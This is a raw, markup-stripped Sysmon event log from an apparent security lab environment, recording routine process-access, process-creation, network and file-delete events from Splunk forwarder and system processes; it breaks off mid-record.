 10341000x8000000000000000219352Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:44.677{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219351Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:44.677{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219350Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:44.677{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219349Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:44.677{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219348Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:44.677{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219347Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:44.677{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219346Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:44.677{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-1508-6216-C204-000000003902}3304C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000219345Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:44.677{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1508-6216-C204-000000003902}3304C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000219344Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:44.678{4F8D34B0-1508-6216-C204-000000003902}3304C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000219343Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:42.532{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51516-false10.0.1.12-8000- 23542300x8000000000000000219342Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:44.318{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E439DB64915F63D8AB6CB341828783A8,SHA256=7DAD5ABAF20F18B2D2E49DC91EF42EB3E04C40D025BEEF11599EB9C896BAF32E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219372Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:45.724{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7621BA56608E18A4C806AE177F6CE364,SHA256=4B5DA0EDF4A95F64150AAE2BAB4F0CEBE2860753A82390C62B34BF060795CF92,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295248Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:45.773{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4ED2E12E85350BAE7AEC6907CBFF44BD,SHA256=89C601F61EB84FD18353445EC73C165265D854E88464FA50E9707FD168CA9BBF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000219371Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:45.552{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1509-6216-C304-000000003902}3208C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219370Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:45.552{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219369Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:45.552{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219368Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:45.552{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219367Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:45.552{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219366Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:45.552{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219365Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:45.552{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219364Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:45.552{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219363Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:45.552{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1509-6216-C304-000000003902}3208C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000219362Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:45.552{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219361Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:45.552{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219360Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:45.552{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1509-6216-C304-000000003902}3208C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000219359Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:45.553{4F8D34B0-1509-6216-C304-000000003902}3208C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000219358Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:45.100{4F8D34B0-1508-6216-C204-000000003902}33043552C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000219376Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:46.959{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3EF10D865895173B8F6C5C592A65EDD,SHA256=686A7EF33D14862AAA55E90B69801930A57C2D2E84034DF360275ADC1E0373FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295250Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:46.788{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72F8A43BC48AE2FA513CC8CAA55E95E8,SHA256=05ACEB63F55AFA4554CD64BA36092B5E4BD317C7CF95C4B7E832F12230926548,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219375Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:46.943{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 